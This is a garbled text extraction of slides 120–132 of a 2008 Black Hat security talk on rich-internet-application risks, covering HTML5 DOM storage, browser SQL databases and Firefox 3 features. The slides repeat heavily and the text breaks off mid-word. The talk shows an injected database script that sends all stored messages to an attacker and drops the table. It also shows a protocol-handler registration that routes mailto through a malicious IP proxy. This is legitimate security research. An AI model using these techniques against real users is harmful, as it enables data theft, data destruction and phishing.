sessionlocalStorage persists beyond the session never expires,limited to 5M

Database storage via openDatabase()

All expected to be same-origin

Living in theRIA World

HTML 5New features in Firefox and WebKit

http://find/http://goback/

7/29/2019 Ria World Bh 2008

120/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

The standards-based approach

Introduces DOM storage sessionStorage andlocalStorage

sessionStorage stores arbitrary amounts of data for a single

sessionlocalStorage persists beyond the session never expires,limited to 5M

Database storage via openDatabase()

All expected to be same-origin

Living in theRIA World

HTML 5New features in Firefox and WebKit

http://find/

7/29/2019 Ria World Bh 2008

121/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

The standards-based approach

Introduces DOM storage sessionStorage andlocalStorage

sessionStorage stores arbitrary amounts of data for a single

sessionlocalStorage persists beyond the session never expires,limited to 5M

Database storage via openDatabase()

All expected to be same-origin

Living in theRIA World

DOM Storage

http://find/

7/29/2019 Ria World Bh 2008

122/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

The major goals of DOM storage more storage spaceand real persistence

Cookies considered too small

Users delete cookies, or wont accept them

DOM storage bypasses pesky users

However, pesky users can use:

about:config dom.storage.enabled = false

Living in theRIA World

Browser-based SQL DatabasesDatabaseJacking

http://find/

7/29/2019 Ria World Bh 2008

123/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Injection attacks become far more damaging when you caninsert code like this:

v a r db=o p e n D a t a b a s e ( " e - m a i l " , [ ] , " M y p r ec i ou s e - m ai l " , " 3 . 1 4 " ) ;

a l l m e s s a g e s=db . e x e c u t e S q l ( " S E LE CT * F RO M M SG S " , [ ] , f u n c t i o n ( r e s u l t s ) {s e n d T o A t t a c k e r ( r e s u l t s ) ; }

) ;

db . e x e c u t e S q l ( " D R OP T AB L E M E SS A GE S " , [ ] , f u n c t i o n ( ) {a l e r t ( " l o l " ) ; }

) ;

Living in theRIA World

Firefox 3Mozilla-specific issues

http://find/

7/29/2019 Ria World Bh 2008

124/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Cross-Site XMLHttpRequest removed in late FF3betas, but it may return

globalStorage

FF2 has weak same-origin restrictions

FF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorage

The RIA world is totally SQL-happy

Downloads, cookies, form history, search history, etc, allstored in local SQLite databases

Why?? This data isnt relational.

Living in theRIA World

Firefox 3Mozilla-specific issues

http://find/http://goback/

7/29/2019 Ria World Bh 2008

125/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Cross-Site XMLHttpRequest removed in late FF3betas, but it may return

globalStorage

FF2 has weak same-origin restrictions

FF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorage

The RIA world is totally SQL-happy

Downloads, cookies, form history, search history, etc, allstored in local SQLite databases

Why?? This data isnt relational.

Living in theRIA World

Firefox 3Mozilla-specific issues

http://find/

7/29/2019 Ria World Bh 2008

126/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Cross-Site XMLHttpRequest removed in late FF3betas, but it may return

globalStorage

FF2 has weak same-origin restrictions

FF2 and FF3 both omit any UI to view/change/deleteDeprecated in HTML 5 for localStorage

The RIA world is totally SQL-happy

Downloads, cookies, form history, search history, etc, allstored in local SQLite databases

Why?? This data isnt relational.

Living in theRIA World

Firefox 3Additional fun

S ki f t ki d d t t

http://find/http://goback/

7/29/2019 Ria World Bh 2008

127/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Speaking of tracking and data storage. . .

Did you have History turned off? FF3 may have turned itback on.

Also new in FF3: nsIdleService idle tracking through

XPCOMEXSLT eXtensible Stylesheet LanguageTransformations werent extensible enough, so here are theextensions. Thankfully, XSLT has been bug-free.

Websites can now be protocol handlers a novel way toimplement spyware

Living in theRIA World

Firefox 3Additional fun

S ki f t ki d d t t

http://find/http://goback/

7/29/2019 Ria World Bh 2008

128/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Speaking of tracking and data storage. . .

Did you have History turned off? FF3 may have turned itback on.

Also new in FF3: nsIdleService idle tracking through

XPCOMEXSLT eXtensible Stylesheet LanguageTransformations werent extensible enough, so here are theextensions. Thankfully, XSLT has been bug-free.

Websites can now be protocol handlers a novel way toimplement spyware

Living in theRIA World

I d i

Firefox 3Additional fun

S eaki of t acki a d data sto a e

http://find/

7/29/2019 Ria World Bh 2008

129/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Speaking of tracking and data storage. . .

Did you have History turned off? FF3 may have turned itback on.

Also new in FF3: nsIdleService idle tracking through

XPCOMEXSLT eXtensible Stylesheet LanguageTransformations werent extensible enough, so here are theextensions. Thankfully, XSLT has been bug-free.

Websites can now be protocol handlers a novel way toimplement spyware

Living in theRIA World

I t d ti

Firefox 3Protocol Handlers

Set up a dumb proxy forwarding traffic to the real handler

http://find/http://goback/

7/29/2019 Ria World Bh 2008

130/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlusMozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Set up a dumb proxy, forwarding traffic to the real handlerIP (and rewriting Host: headers)

Register a new protocol handler thusly:

n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( m a i l t o , h t t p

: / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s , Yahoo ! Mail ) ;

Use your malicious IP instead of a name, users wont knowthe difference

The only security restriction is that the handler has togo to the domain trying to install it.

Living in theRIA World

Introduction

Firefox 3Protocol Handlers

Set up a dumb proxy forwarding traffic to the real handler

http://find/

7/29/2019 Ria World Bh 2008

131/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlusMozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Set up a dumb proxy, forwarding traffic to the real handlerIP (and rewriting Host: headers)

Register a new protocol handler thusly:

n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( m a i l t o , h t t p

: / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s , Yahoo ! Mail ) ;

Use your malicious IP instead of a name, users wont knowthe difference

The only security restriction is that the handler has togo to the domain trying to install it.

Living in theRIA World

Introduction

Firefox 3Protocol Handlers

Set up a dumb proxy forwarding traffic to the real handler

http://find/http://goback/

7/29/2019 Ria World Bh 2008

132/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlusMozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Set up a dumb proxy, forwarding traffic to the real handlerIP (and rewriting Host: headers)

Register a new protocol handler thusly:

n a v i g a t o r . r e g i s t e r P r o t o c o l H a n d l e r ( m a i l t o , h t t p

: / / 1 2 3 . 1 4 2 . 1 2 0 . 1 2 9 : 8 0 8 0 / dc / l a u n c h ? a c t i o n=compose&To=%s , Yahoo ! Mail ) ;

Use your malicious IP instead of a name, users wont knowthe difference

The only security restriction is that the handler has togo to the domain trying to install it.

Living in theRIA World

Introduction

Firef